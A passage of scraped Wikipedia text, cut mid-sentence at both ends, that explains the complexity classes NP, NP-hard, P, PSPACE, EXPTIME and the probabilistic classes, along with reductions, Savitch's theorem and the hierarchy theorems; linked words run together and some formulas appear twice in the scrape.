"NP versus co-NP" question). Because of the many important problems in this class, there have been extensive efforts to find polynomial-time algorithms for problems in NP. However, there remain a large number of problems in NP that defy such attempts, seeming to requiresuper-polynomial time. Whether these problems are not decidable in polynomial time is one of the greatest open questions incomputer science(seePversus NP ("P = NP") problemfor an in-depth discussion). An important notion in this context is the set ofNP-completedecision problems, which is a subset of NP and might be informally described as the "hardest" problems in NP. If there is a polynomial-time algorithm for evenoneof them, then there is a polynomial-time algorithm forallthe problems in NP. Because of this, and because dedicated research has failed to find a polynomial algorithm for any NP-complete problem, once a problem has been proven to be NP-complete, this is widely regarded as a sign that a polynomial algorithm for this problem is unlikely to exist. However, in practical uses, instead of spending computational resources looking for an optimal solution, a good enough (but potentially suboptimal) solution may often be found in polynomial time. Also, the real-life applications of some problems are easier than their theoretical equivalents. The two definitions of NP as the class of problems solvable by a nondeterministicTuring machine(TM) in polynomial time and the class of problems verifiable by a deterministic Turing machine in polynomial time are equivalent. The proof is described by many textbooks, for example, Sipser'sIntroduction to the Theory of Computation, section 7.3. To show this, first, suppose we have a deterministic verifier. A non-deterministic machine can simply nondeterministically run the verifier on all possible proof strings (this requires only polynomially many steps because it can nondeterministically choose the next character in the proof string in each step, and the length of the proof string must be polynomially bounded). If any proof is valid, some path will accept; if no proof is valid, the string is not in the language and it will reject. Conversely, suppose we have a non-deterministic TM called A accepting a given language L. At each of its polynomially many steps, the machine'scomputation treebranches in at most a finite number of directions. There must be at least one accepting path, and the string describing this path is the proof supplied to the verifier. The verifier can then deterministically simulate A, following only the accepting path, and verifying that it accepts at the end. If A rejects the input, there is no accepting path, and the verifier will always reject. NP contains all problems inP, since one can verify any instance of the problem by simply ignoring the proof and solving it. NP is contained inPSPACE—to show this, it suffices to construct a PSPACE machine that loops over all proof strings and feeds each one to a polynomial-time verifier. Since a polynomial-time machine can only read polynomially many bits, it cannot use more than polynomial space, nor can it read a proof string occupying more than polynomial space (so we do not have to consider proofs longer than this). NP is also contained inEXPTIME, since the same algorithm operates in exponential time. co-NP contains those problems that have a simple proof fornoinstances, sometimes called counterexamples. For example,primality testingtrivially lies in co-NP, since one can refute the primality of an integer by merely supplying a nontrivial factor. NP and co-NP together form the first level in thepolynomial hierarchy, higher only than P. NP is defined using only deterministic machines. If we permit the verifier to be probabilistic (this, however, is not necessarily a BPP machine[6]), we get the classMAsolvable using anArthur–Merlin protocolwith no communication from Arthur to Merlin. The relationship betweenBPPandNPis unknown: it is not known whetherBPPis asubsetofNP,NPis a subset ofBPPor neither. IfNPis contained inBPP, which is considered unlikely since it would imply practical solutions forNP-completeproblems, thenNP=RPandPH⊆BPP.[7] NP is a class ofdecision problems; the analogous class of function problems isFNP. The only known strict inclusions come from thetime hierarchy theoremand thespace hierarchy theorem, and respectively they areNP⊊NEXPTIME{\displaystyle {\mathsf {NP\subsetneq NEXPTIME}}}andNP⊊EXPSPACE{\displaystyle {\mathsf {NP\subsetneq EXPSPACE}}}. In terms ofdescriptive complexity theory, NP corresponds precisely to the set of languages definable by existentialsecond-order logic(Fagin's theorem). NP can be seen as a very simple type ofinteractive proof system, where the prover comes up with the proof certificate and the verifier is a deterministic polynomial-time machine that checks it. It is complete because the right proof string will make it accept if there is one, and it is sound because the verifier cannot accept if there is no acceptable proof string. A major result of complexity theory is that NP can be characterized as the problems solvable byprobabilistically checkable proofswhere the verifier uses O(logn) random bits and examines only a constant number of bits of the proof string (the classPCP(logn, 1)). More informally, this means that the NP verifier described above can be replaced with one that just "spot-checks" a few places in the proof string, and using a limited number of coin flips can determine the correct answer with high probability. This allows several results about the hardness ofapproximation algorithmsto be proven. All problems inP, denotedP⊆NP{\displaystyle {\mathsf {P\subseteq NP}}}. Given a certificate for a problem inP, we can ignore the certificate and just solve the problem in polynomial time. The decision problem version of theinteger factorization problem: given integersnandk, is there a factorfwith 1 <f<kandfdividingn?[8] EveryNP-completeproblem is in NP. TheBoolean satisfiability problem(SAT), where we want to know whether or not a certain formula inpropositional logicwithBoolean variablesis true for some value of the variables.[9] The decision version of thetravelling salesman problemis in NP. Given an input matrix of distances betweenncities, the problem is to determine if there is a route visiting all cities with total distance less thank. A proof can simply be a list of the cities. Then verification can clearly be done in polynomial time. It simply adds the matrix entries corresponding to the paths between the cities. Anondeterministic Turing machinecan find such a route as follows: One can think of each guess as "forking" a new copy of the Turing machine to follow each of the possible paths forward, and if at least one machine finds a route of distance less thank, that machine accepts the input. (Equivalently, this can be thought of as a single Turing machine that always guesses correctly) Abinary searchon the range of possible distances can convert the decision version of Traveling Salesman to the optimization version, by calling the decision version repeatedly (a polynomial number of times).[10][8] Thesubgraph isomorphism problemof determining whether graphGcontains a subgraph that is isomorphic to graphH.[11]
https://en.wikipedia.org/wiki/Nondeterministic_polynomial_time
Incomputational complexity theory, a computational problemHis calledNP-hardif, for every problemLwhich can be solved innon-deterministic polynomial-time, there is apolynomial-time reductionfromLtoH. That is, assuming a solution forHtakes 1 unit time,H's solution can be used to solveLin polynomial time.[1][2]As a consequence, finding a polynomial time algorithm to solve a single NP-hard problem would give polynomial time algorithms for all the problems in the complexity classNP. As it is suspected, but unproven, thatP≠NP, it is unlikely that any polynomial-time algorithms for NP-hard problems exist.[3][4] A simple example of an NP-hard problem is thesubset sum problem. Informally, ifHis NP-hard, then it is at least as difficult to solve as the problems inNP. However, the opposite direction is not true: some problems areundecidable, and therefore even more difficult to solve than all problems in NP, but they are probably not NP-hard (unless P=NP).[5] Adecision problemHis NP-hard when for every problemLin NP, there is apolynomial-time many-one reductionfromLtoH.[1]: 80 Another definition is to require that there be a polynomial-time reduction from anNP-completeproblemGtoH.[1]: 91As any problemLin NP reduces in polynomial time toG,Lreduces in turn toHin polynomial time so this new definition implies the previous one. It does not restrict the class NP-hard to decision problems, and it also includessearch problemsoroptimization problems. If P ≠ NP, then NP-hard problems could not be solved in polynomial time. Some NP-hard optimization problems can be polynomial-timeapproximatedup to some constant approximation ratio (in particular, those inAPX) or even up to any approximation ratio (those inPTASorFPTAS). There are many classes of approximability, each one enabling approximation up to a different level.[6] AllNP-completeproblems are also NP-hard (seeList of NP-complete problems). For example, the optimization problem of finding the least-cost cyclic route through all nodes of a weighted graph—commonly known as thetravelling salesman problem—is NP-hard.[7]Thesubset sum problemis another example: given a set of integers, does any non-empty subset of them add up to zero? That is adecision problemand happens to be NP-complete. There are decision problems that areNP-hardbut notNP-completesuch as thehalting problem. That is the problem which asks "given a program and its input, will it run forever?" That is ayes/noquestion and so is a decision problem. It is easy to prove that the halting problem is NP-hard but not NP-complete. For example, theBoolean satisfiability problemcan be reduced to the halting problem by transforming it to the description of aTuring machinethat tries alltruth valueassignments and when it finds one that satisfies the formula it halts and otherwise it goes into an infinite loop. It is also easy to see that the halting problem is not inNPsince all problems in NP are decidable in a finite number of operations, but the halting problem, in general, isundecidable. There are also NP-hard problems that are neitherNP-completenorUndecidable. For instance, the language oftrue quantified Boolean formulasis decidable inpolynomial space, but not in non-deterministic polynomial time (unless NP =PSPACE).[8] NP-hard problems do not have to be elements of the complexity class NP. As NP plays a central role incomputational complexity, it is used as the basis of several classes: NP-hard problems are often tackled with rules-based languages in areas including: Problems that are decidable but notNP-complete, often are optimization problems:
https://en.wikipedia.org/wiki/NP-hardness
Incomputational complexity theory, acomplexity classis asetofcomputational problems"of related resource-basedcomplexity".[1]The two most commonly analyzed resources aretimeandmemory. In general, a complexity class is defined in terms of a type of computational problem, amodel of computation, and a bounded resource liketimeormemory. In particular, most complexity classes consist ofdecision problemsthat are solvable with aTuring machine, and are differentiated by their time or space (memory) requirements. For instance, the classPis the set of decision problems solvable by a deterministic Turing machine inpolynomial time. There are, however, many complexity classes defined in terms of other types of problems (e.g.counting problemsandfunction problems) and using other models of computation (e.g.probabilistic Turing machines,interactive proof systems,Boolean circuits, andquantum computers). The study of the relationships between complexity classes is a major area of research intheoretical computer science. There are often general hierarchies of complexity classes; for example, it is known that a number of fundamental time and space complexity classes relate to each other in the following way:L⊆NL⊆P⊆NP⊆PSPACE⊆EXPTIME⊆NEXPTIME⊆EXPSPACE(where ⊆ denotes thesubsetrelation). However, many relationships are not yet known; for example, one of the most famousopen problemsin computer science concerns whetherPequalsNP. The relationships between classes often answer questions about the fundamental nature of computation. ThePversusNPproblem, for instance, is directly related to questions of whethernondeterminismadds any computational power to computers and whether problems having solutions that can be quickly checked for correctness can also be quickly solved. Complexity classes aresetsof relatedcomputational problems. They are defined in terms of the computational difficulty of solving the problems contained within them with respect to particular computational resources like time or memory. More formally, the definition of a complexity class consists of three things: a type of computational problem, a model of computation, and a bounded computational resource. In particular, most complexity classes consist ofdecision problemsthat can be solved by aTuring machinewith boundedtimeorspaceresources. For example, the complexity classPis defined as the set ofdecision problemsthat can be solved by adeterministic Turing machineinpolynomial time. Intuitively, acomputational problemis just a question that can be solved by analgorithm. For example, "is thenatural numbern{\displaystyle n}prime?" is a computational problem. A computational problem is mathematically represented as thesetof answers to the problem. In the primality example, the problem (call itPRIME{\displaystyle {\texttt {PRIME}}}) is represented by the set of all natural numbers that are prime:PRIME={n∈N|nis prime}{\displaystyle {\texttt {PRIME}}=\{n\in \mathbb {N} |n{\text{ is prime}}\}}. In the theory of computation, these answers are represented asstrings; for example, in the primality example the natural numbers could be represented as strings ofbitsthat representbinary numbers. For this reason, computational problems are often synonymously referred to as languages, since strings of bits representformal languages(a concept borrowed fromlinguistics); for example, saying that thePRIME{\displaystyle {\texttt {PRIME}}}problem is in the complexity classPis equivalent to saying that the languagePRIME{\displaystyle {\texttt {PRIME}}}is inP. The most commonly analyzed problems in theoretical computer science aredecision problems—the kinds of problems that can be posed asyes–no questions. The primality example above, for instance, is an example of a decision problem as it can be represented by the yes–no question "is thenatural numbern{\displaystyle n}prime". In terms of the theory of computation, a decision problem is represented as the set of input strings that a computer running a correctalgorithmwould answer "yes" to. In the primality example,PRIME{\displaystyle {\texttt {PRIME}}}is the set of strings representing natural numbers that, when input into a computer running an algorithm that correctlytests for primality, the algorithm answers "yes, this number is prime". This "yes-no" format is often equivalently stated as "accept-reject"; that is, an algorithm "accepts" an input string if the answer to the decision problem is "yes" and "rejects" if the answer is "no". While some problems cannot easily be expressed as decision problems, they nonetheless encompass a broad range of computational problems.[2]Other types of problems that certain complexity classes are defined in terms of include: To make concrete the notion of a "computer", in theoretical computer science problems are analyzed in the context of acomputational model. Computational models make exact the notions of computational resources like "time" and "memory". Incomputational complexity theory, complexity classes deal with theinherentresource requirements of problems and not the resource requirements that depend upon how a physical computer is constructed. For example, in the real world different computers may require different amounts of time and memory to solve the same problem because of the way that they have been engineered. By providing an abstract mathematical representations of computers, computational models abstract away superfluous complexities of the real world (like differences inprocessorspeed) that obstruct an understanding of fundamental principles. The most commonly used computational model is theTuring machine. While other models exist and many complexity classes are defined in terms of them (see section"Other models of computation"), the Turing machine is used to define most basic complexity classes. With the Turing machine, instead of using standard units of time like the second (which make it impossible to disentangle running time from the speed of physical hardware) and standard units of memory likebytes, the notion of time is abstracted as the number of elementary steps that a Turing machine takes to solve a problem and the notion of memory is abstracted as the number of cells that are used on the machine's tape. These are explained in greater detail below. It is also possible to use theBlum axiomsto define complexity classes without referring to a concretecomputational model, but this approach is less frequently used in complexity theory. ATuring machineis a mathematical model of a general computing machine. It is the most commonly used model in complexity theory, owing in large part to the fact that it is believed to be as powerful as any other model of computation and is easy to analyze mathematically. Importantly, it is believed that if there exists an algorithm that solves a particular problem then there also exists a Turing machine that solves that same problem (this is known as theChurch–Turing thesis); this means that it is believed thateveryalgorithm can be represented as a Turing machine. Mechanically, a Turing machine (TM) manipulates symbols (generally restricted to the bits 0 and 1 to provide an intuitive connection to real-life computers) contained on an infinitely long strip of tape. The TM can read and write, one at a time, using a tape head. Operation is fully determined by a finite set of elementary instructions such as "in state 42, if the symbol seen is 0, write a 1; if the symbol seen is 1, change into state 17; in state 17, if the symbol seen is 0, write a 1 and change to state 6". The Turing machine starts with only the input string on its tape and blanks everywhere else. The TM accepts the input if it enters a designated accept state and rejects the input if it enters a reject state. The deterministic Turing machine (DTM) is the most basic type of Turing machine. It uses a fixed set of rules to determine its future actions (which is why it is called "deterministic"). A computational problem can then be defined in terms of a Turing machine as the set of input strings that a particular Turing machine accepts. For example, the primality problemPRIME{\displaystyle {\texttt {PRIME}}}from above is the set of strings (representing natural numbers) that a Turing machine running an algorithm that correctlytests for primalityaccepts. A Turing machine is said torecognizea language (recall that "problem" and "language" are largely synonymous in computability and complexity theory) if it accepts all inputs that are in the language and is said todecidea language if it additionally rejects all inputs that are not in the language (certain inputs may cause a Turing machine to run forever, sodecidabilityplaces the additional constraint overrecognizabilitythat the Turing machine must halt on all inputs). A Turing machine that "solves" a problem is generally meant to mean one that decides the language. Turing machines enable intuitive notions of "time" and "space". Thetime complexityof a TM on a particular input is the number of elementary steps that the Turing machine takes to reach either an accept or reject state. Thespace complexityis the number of cells on its tape that it uses to reach either an accept or reject state. The deterministic Turing machine (DTM) is a variant of the nondeterministic Turing machine (NTM). Intuitively, an NTM is just a regular Turing machine that has the added capability of being able to explore multiple possible future actions from a given state, and "choosing" a branch that accepts (if any accept). That is, while a DTM must follow only one branch of computation, an NTM can be imagined as a computation tree, branching into many possible computational pathways at each step (see image). If at least one branch of the tree halts with an "accept" condition, then the NTM accepts the input. In this way, an NTM can be thought of as simultaneously exploring all computational possibilities in parallel and selecting an accepting branch.[3]NTMs are not meant to be physically realizable models, they are simply theoretically interesting abstract machines that give rise to a number of interesting complexity classes (which often do have physically realizable equivalent definitions). Thetime complexityof an NTM is the maximum number of steps that the NTM uses onanybranch of its computation.[4]Similarly, thespace complexityof an NTM is the maximum number of cells that the NTM uses on any branch of its computation. DTMs can be viewed as a special case of NTMs that do not make use of the power of nondeterminism. Hence, every computation that can be carried out by a DTM can also be carried out by an equivalent NTM. It is also possible to simulate any NTM using a DTM (the DTM will simply compute every possible computational branch one-by-one). Hence, the two are equivalent in terms of computability. However, simulating an NTM with a DTM often requires greater time and/or memory resources; as will be seen, how significant this slowdown is for certain classes of computational problems is an important question in computational complexity theory. Complexity classes group computational problems by their resource requirements. To do this, computational problems are differentiated byupper boundson the maximum amount of resources that the most efficient algorithm takes to solve them. More specifically, complexity classes are concerned with therate of growthin the resources required to solve particular computational problems as the input size increases. For example, the amount of time it takes to solve problems in the complexity classPgrows at apolynomialrate as the input size increases, which is comparatively slow compared to problems in the exponential complexity classEXPTIME(or more accurately, for problems inEXPTIMEthat are outside ofP, sinceP⊆EXPTIME{\displaystyle {\mathsf {P}}\subseteq {\mathsf {EXPTIME}}}). Note that the study of complexity classes is intended primarily to understand theinherentcomplexity required to solve computational problems. Complexity theorists are thus generally concerned with finding the smallest complexity class that a problem falls into and are therefore concerned with identifying which class a computational problem falls into using themost efficientalgorithm. There may be an algorithm, for instance, that solves a particular problem in exponential time, but if the most efficient algorithm for solving this problem runs in polynomial time then the inherent time complexity of that problem is better described as polynomial. Thetime complexityof an algorithm with respect to the Turing machine model is the number of steps it takes for a Turing machine to run an algorithm on a given input size. Formally, the time complexity for an algorithm implemented with a Turing machineM{\displaystyle M}is defined as the functiontM:N→N{\displaystyle t_{M}:\mathbb {N} \to \mathbb {N} }, wheretM(n){\displaystyle t_{M}(n)}is the maximum number of steps thatM{\displaystyle M}takes on any input of lengthn{\displaystyle n}. In computational complexity theory, theoretical computer scientists are concerned less with particular runtime values and more with the general class of functions that the time complexity function falls into. For instance, is the time complexity function apolynomial? Alogarithmic function? Anexponential function? Or another kind of function? Thespace complexityof an algorithm with respect to the Turing machine model is the number of cells on the Turing machine's tape that are required to run an algorithm on a given input size. Formally, the space complexity of an algorithm implemented with a Turing machineM{\displaystyle M}is defined as the functionsM:N→N{\displaystyle s_{M}:\mathbb {N} \to \mathbb {N} }, wheresM(n){\displaystyle s_{M}(n)}is the maximum number of cells thatM{\displaystyle M}uses on any input of lengthn{\displaystyle n}. Complexity classes are often defined using granular sets of complexity classes calledDTIMEandNTIME(for time complexity) andDSPACEandNSPACE(for space complexity). Usingbig O notation, they are defined as follows: Pis the class of problems that are solvable by adeterministic Turing machineinpolynomial timeandNPis the class of problems that are solvable by anondeterministic Turing machinein polynomial time. Or more formally, Pis often said to be the class of problems that can be solved "quickly" or "efficiently" by a deterministic computer, since thetime complexityof solving a problem inPincreases relatively slowly with the input size. An important characteristic of the classNPis that it can be equivalently defined as the class of problems whose solutions areverifiableby a deterministic Turing machine in polynomial time. That is, a language is inNPif there exists adeterministicpolynomial time Turing machine, referred to as the verifier, that takes as input a stringw{\displaystyle w}anda polynomial-sizecertificatestringc{\displaystyle c}, and acceptsw{\displaystyle w}ifw{\displaystyle w}is in the language and rejectsw{\displaystyle w}ifw{\displaystyle w}is not in the language. Intuitively, the certificate acts as aproofthat the inputw{\displaystyle w}is in the language. Formally:[5] This equivalence between the nondeterministic definition and the verifier definition highlights a fundamental connection betweennondeterminismand solution verifiability. Furthermore, it also provides a useful method for proving that a language is inNP—simply identify a suitable certificate and show that it can be verified in polynomial time. While there might seem to be an obvious difference between the class of problems that are efficiently solvable and the class of problems whose solutions are merely efficiently checkable,PandNPare actually at the center of one of the most famous unsolved problems in computer science: thePversusNPproblem. While it is known thatP⊆NP{\displaystyle {\mathsf {P}}\subseteq {\mathsf {NP}}}(intuitively, deterministic Turing machines are just a subclass of nondeterministic Turing machines that don't make use of their nondeterminism; or under the verifier definition,Pis the class of problems whose polynomial time verifiers need only receive the empty string as their certificate), it is not known whetherNPis strictly larger thanP. IfP=NP, then it follows that nondeterminism providesno additional computational powerover determinism with regards to the ability to quickly find a solution to a problem; that is, being able to exploreall possible branchesof computation providesat mosta polynomial speedup over being able to explore only a single branch. Furthermore, it would follow that if there exists a proof for a problem instance and that proof can be quickly be checked for correctness (that is, if the problem is inNP), then there also exists an algorithm that can quicklyconstructthat proof (that is, the problem is inP).[6]However, the overwhelming majority of computer scientists believe thatP≠NP{\displaystyle {\mathsf {P}}\neq {\mathsf {NP}}},[7]and mostcryptographic schemesemployed today rely on the assumption thatP≠NP{\displaystyle {\mathsf {P}}\neq {\mathsf {NP}}}.[8] EXPTIME(sometimes shortened toEXP) is the class of decision problems solvable by a deterministic Turing machine in exponential time andNEXPTIME(sometimes shortened toNEXP) is the class of decision problems solvable by a nondeterministic Turing machine in exponential time. Or more formally, EXPTIMEis a strict superset ofPandNEXPTIMEis a strict superset ofNP. It is further the case thatEXPTIME⊆{\displaystyle \subseteq }NEXPTIME. It is not known whether this is proper, but ifP=NPthenEXPTIMEmust equalNEXPTIME. While it is possible to definelogarithmictime complexity classes, these are extremely narrow classes as sublinear times do not even enable a Turing machine to read the entire input (becauselog⁡n<n{\displaystyle \log n<n}).[a][9]However, there are a meaningful number of problems that can be solved in logarithmic space. The definitions of these classes require atwo-tape Turing machineso that it is possible for the machine to store the entire input (it can be shown that in terms ofcomputabilitythe two-tape Turing machine is equivalent to the single-tape Turing machine).[10]In the two-tape Turing machine model, one tape is the input tape, which is read-only. The other is the work tape, which allows both reading and writing and is the tape on which the Turing machine performs computations. The space complexity of the Turing machine is measured as the number of cells that are used on the work tape. L(sometimes lengthened toLOGSPACE) is then defined as the class of problems solvable in logarithmic space on a deterministic Turing machine andNL(sometimes lengthened toNLOGSPACE) is the class of problems solvable in logarithmic space on a nondeterministic Turing machine. Or more formally,[10] It is known thatL⊆NL⊆P{\displaystyle {\mathsf {L}}\subseteq {\mathsf {NL}}\subseteq {\mathsf {P}}}. However, it is not known whether any of these relationships is proper. The complexity classesPSPACEandNPSPACEare the space analogues toPandNP. That is,PSPACEis the class of problems solvable in polynomial space by a deterministic Turing machine andNPSPACEis the class of problems solvable in polynomial space by a nondeterministic Turing machine. More formally, While it is not known whetherP=NP,Savitch's theoremfamously showed thatPSPACE=NPSPACE. It is also known thatP⊆PSPACE{\displaystyle {\mathsf {P}}\subseteq {\mathsf {PSPACE}}}, which follows intuitively from the fact that, since writing to a cell on a Turing machine's tape is defined as taking one unit of time, a Turing machine operating in polynomial time can only write to polynomially many cells. It is suspected thatPis strictly smaller thanPSPACE, but this has not been proven. The complexity classesEXPSPACEandNEXPSPACEare the space analogues toEXPTIMEandNEXPTIME. That is,EXPSPACEis the class of problems solvable in exponential space by a deterministic Turing machine andNEXPSPACEis the class of problems solvable in exponential space by a nondeterministic Turing machine. Or more formally, Savitch's theoremshowed thatEXPSPACE=NEXPSPACE. This class is extremely broad: it is known to be a strict superset ofPSPACE,NP, andP, and is believed to be a strict superset ofEXPTIME. Complexity classes have a variety ofclosureproperties. For example, decision classes may be closed undernegation,disjunction,conjunction, or even under allBoolean operations. Moreover, they might also be closed under a variety of quantification schemes.P, for instance, is closed under all Boolean operations, and under quantification over polynomially sized domains. Closure properties can be helpful in separating classes—one possible route to separating two complexity classes is to find some closure property possessed by one class but not by the other. Each classXthat is not closed under negation has a complement classco-X, which consists of the complements of the languages contained inX(i.e.co-X={L|L¯∈X}{\displaystyle {\textsf {co-X}}=\{L|{\overline {L}}\in {\mathsf {X}}\}}).co-NP, for instance, is one important complement complexity class, and sits at the center of the unsolved problem over whetherco-NP=NP. Closure properties are one of the key reasons many complexity classes are defined in the way that they are.[11]Take, for example, a problem that can be solved inO(n){\displaystyle O(n)}time (that is, in linear time) and one that can be solved in, at best,O(n1000){\displaystyle O(n^{1000})}time. Both of these problems are inP, yet the runtime of the second grows considerably faster than the runtime of the first as the input size increases. One might ask whether it would be better to define the class of "efficiently solvable" problems using some smaller polynomial bound, likeO(n3){\displaystyle O(n^{3})}, rather than all polynomials, which allows for such large discrepancies. It turns out, however, that the set of all polynomials is the smallest class of functions containing the linear functions that is also closed under addition, multiplication, and composition (for instance,O(n3)∘O(n2)=O(n6){\displaystyle O(n^{3})\circ O(n^{2})=O(n^{6})}, which is a polynomial butO(n6)>O(n3){\displaystyle O(n^{6})>O(n^{3})}).[11]Since we would like composing one efficient algorithm with another efficient algorithm to still be considered efficient, the polynomials are the smallest class that ensures composition of "efficient algorithms".[12](Note that the definition ofPis also useful because, empirically, almost all problems inPthat are practically useful do in fact have low order polynomial runtimes, and almost all problems outside ofPthat are practically useful do not have any known algorithms with small exponential runtimes, i.e. withO(cn){\displaystyle O(c^{n})}runtimes wherecis close to 1.[13]) Many complexity classes are defined using the concept of areduction. A reduction is a transformation of one problem into another problem, i.e. a reduction takes inputs from one problem and transforms them into inputs of another problem. For instance, you can reduce ordinary base-10 additionx+y{\displaystyle x+y}to base-2 addition by transformingx{\displaystyle x}andy{\displaystyle y}to their base-2 notation (e.g. 5+7 becomes 101+111). Formally, a problemX{\displaystyle X}reduces to a problemY{\displaystyle Y}if there exists a functionf{\displaystyle f}such that for everyx∈Σ∗{\displaystyle x\in \Sigma ^{*}},x∈X{\displaystyle x\in X}if and only iff(x)∈Y{\displaystyle f(x)\in Y}. Generally, reductions are used to capture the notion of a problem being at least as difficult as another problem. Thus we are generally interested in using a polynomial-time reduction, since any problemX{\displaystyle X}that can be efficiently reduced to another problemY{\displaystyle Y}is no more difficult thanY{\displaystyle Y}. Formally, a problemX{\displaystyle X}is polynomial-time reducible to a problemY{\displaystyle Y}if there exists apolynomial-timecomputable functionp{\displaystyle p}such that for allx∈Σ∗{\displaystyle x\in \Sigma ^{*}},x∈X{\displaystyle x\in X}if and only ifp(x)∈Y{\displaystyle p(x)\in Y}. Note that reductions can be defined in many different ways. Common reductions areCook reductions,Karp reductionsandLevin reductions, and can vary based on resource bounds, such aspolynomial-time reductionsandlog-space reductions. Reductions motivate the concept of a problem beinghardfor a complexity class. A problemX{\displaystyle X}is hard for a class of problemsCif every problem inCcan be polynomial-time reduced toX{\displaystyle X}. Thus no problem inCis harder thanX{\displaystyle X}, since an algorithm forX{\displaystyle X}allows us to solve any problem inCwith at most polynomial slowdown. Of particular importance, the set of problems that are hard forNPis called the set ofNP-hardproblems. If a problemX{\displaystyle X}is hard forCand is also inC, thenX{\displaystyle X}is said to becompleteforC. This means thatX{\displaystyle X}is the hardest problem inC(since there could be many problems that are equally hard, more preciselyX{\displaystyle X}is as hard as the hardest problems inC). Of particular importance is the class ofNP-completeproblems—the most difficult problems inNP. Because all problems inNPcan be polynomial-time reduced toNP-complete problems, finding anNP-complete problem that can be solved in polynomial time would mean thatP=NP. Savitch's theorem establishes the relationship between deterministic and nondetermistic space resources. It shows that if a nondeterministic Turing machine can solve a problem usingf(n){\displaystyle f(n)}space, then a deterministic Turing machine can solve the same problem inf(n)2{\displaystyle f(n)^{2}}space, i.e. in the square of the space. Formally, Savitch's theorem states that for anyf(n)>n{\displaystyle f(n)>n},[14] Important corollaries of Savitch's theorem are thatPSPACE=NPSPACE(since the square of a polynomial is still a polynomial) andEXPSPACE=NEXPSPACE(since the square of an exponential is still an exponential). These relationships answer fundamental questions about the power of nondeterminism compared to determinism. Specifically, Savitch's theorem shows that any problem that a nondeterministic Turing machine can solve in polynomial space, a deterministic Turing machine can also solve in polynomial space. Similarly, any problem that a nondeterministic Turing machine can solve in exponential space, a deterministic Turing machine can also solve in exponential space. By definition ofDTIME, it follows thatDTIME(nk1){\displaystyle {\mathsf {DTIME}}(n^{k_{1}})}is contained inDTIME(nk2){\displaystyle {\mathsf {DTIME}}(n^{k_{2}})}ifk1≤k2{\displaystyle k_{1}\leq k_{2}}, sinceO(nk1)⊆O(nk2){\displaystyle O(n^{k_{1}})\subseteq O(n^{k_{2}})}ifk1≤k2{\displaystyle k_{1}\leq k_{2}}. However, this definition gives no indication of whether this inclusion is strict. For time and space requirements, the conditions under which the inclusion is strict are given by the time and space hierarchy theorems, respectively. They are called hierarchy theorems because they induce a proper hierarchy on the classes defined by constraining the respective resources. The hierarchy theorems enable one to make quantitative statements about how much more additional time or space is needed in order to increase the number of problems that can be solved. Thetime hierarchy theoremstates that Thespace hierarchy theoremstates that The time and space hierarchy theorems form the basis for most separation results of complexity classes. For instance, the time hierarchy theorem establishes thatPis strictly contained inEXPTIME, and the space hierarchy theorem establishes thatLis strictly contained inPSPACE. While deterministic and non-deterministicTuring machinesare the most commonly used models of computation, many complexity classes are defined in terms of other computational models. In particular, These are explained in greater detail below. A number of important complexity classes are defined using theprobabilistic Turing machine, a variant of theTuring machinethat can toss random coins. These classes help to better describe the complexity ofrandomized algorithms. A probabilistic Turing machine is similar to a deterministic Turing machine, except rather than following a single transition function (a set of rules for how to proceed at each step of the computation) it probabilistically selects between multiple transition functions at each step. The standard definition of a probabilistic Turing machine specifies two transition functions, so that the selection of transition function at each step resembles a coin flip. The randomness introduced at each step of the computation introduces the potential for error; that is, strings that the Turing machine is meant to accept may on some occasions be rejected and strings that the Turing machine is meant to reject may on some occasions be accepted. As a result, the complexity classes based on the probabilistic Turing machine are defined in large part around the amount of error that is allowed. Formally, they are defined using an error probabilityϵ{\displaystyle \epsilon }. A probabilistic Turing machineM{\displaystyle M}is said to recognize a languageL{\displaystyle L}with error probabilityϵ{\displaystyle \epsilon }if: The fundamental randomized time complexity classes areZPP,RP,co-RP,BPP, andPP. The strictest class isZPP(zero-error probabilistic polynomial time), the class of problems solvable in polynomial time by a probabilistic Turing machine with error probability 0. Intuitively, this is the strictest class of probabilistic problems because it demandsno error whatsoever. A slightly looser class isRP(randomized polynomial time), which maintains no error for strings not in the language but allows bounded error for strings in the language. More formally, a language is inRPif there is a probabilistic polynomial-time Turing machineM{\displaystyle M}such that if a string is not in the language thenM{\displaystyle M}always rejects and if a string is in the language thenM{\displaystyle M}accepts with a probability at least 1/2. The classco-RPis similarly defined except the roles are flipped: error is not allowed for strings in the language but is allowed for strings not in the language. Taken together, the classesRPandco-RPencompass all of the problems that can be solved by probabilistic Turing machines withone-sided error. Loosening the error requirements further to allow fortwo-sided erroryields the classBPP(bounded-error probabilistic polynomial time), the class of problems solvable in polynomial time by a probabilistic Turing machine with error probability less than 1/3 (for both strings in the language and not in the language).BPPis the most practically relevant of the probabilistic complexity classes—problems inBPPhave efficientrandomized algorithmsthat can be run quickly on real computers.BPPis also at the center of the important unsolved problem in computer science over whetherP=BPP, which if true would mean that randomness does not increase the computational power of computers, i.e. any probabilistic Turing machine could be simulated by a deterministic Turing machine with at most polynomial slowdown. The broadest class of efficiently-solvable probabilistic problems isPP(probabilistic polynomial time), the set of languages solvable by a probabilistic Turing machine in polynomial time with an error probability of less than 1/2 for all strings. ZPP,RPandco-RPare all subsets ofBPP, which in turn is a subset ofPP. The reason for this is intuitive: the classes allowing zero error and only one-sided error are all contained within the class that allows two-sided error, andPPsimply relaxes the error probability ofBPP.ZPPrelates toRPandco-RPin the following way:ZPP=RP∩co-RP{\displaystyle {\textsf {ZPP}}={\textsf {RP}}\cap {\textsf {co-RP}}}. That is,ZPPconsists exactly of those problems that are in bothRPandco-RP. Intuitively, this follows from the fact thatRPandco-RPallow only one-sided error:co-RPdoes not allow error for strings in the language andRPdoes not allow error for strings not in the language. Hence, if a problem is in bothRPandco-RP, then there must be no error for strings both inandnot in the language (i.e. no error whatsoever), which is exactly the definition ofZPP. Important randomized space complexity classes includeBPL,RL, andRLP. A number of complexity classes are defined usinginteractive proof systems. Interactive proofs generalize the proofs definition of the complexity classNPand yield insights intocryptography,approximation algorithms, andformal verification. Interactive proof systems areabstract machinesthat model computation as the exchange of messages between two parties: a proverP{\displaystyle P}and a verifierV{\displaystyle V}. The parties interact by exchanging messages, and an input string is accepted by the system if the verifier decides to accept the input on the basis of the messages it has received from the prover. The proverP{\displaystyle P}has unlimited computational power while the verifier has bounded computational power (the standard definition of interactive proof systems defines the verifier to be polynomially-time bounded). The prover, however, is untrustworthy (this prevents all languages from being trivially recognized by the proof system by having the computationally unbounded prover solve for whether a string is in a language and then sending a trustworthy "YES" or "NO" to the verifier), so the verifier must conduct an "interrogation" of the prover by "asking it" successive rounds of questions, accepting only if it develops a high degree of confidence that the string is in the language.[15] The classNPis a simple proof 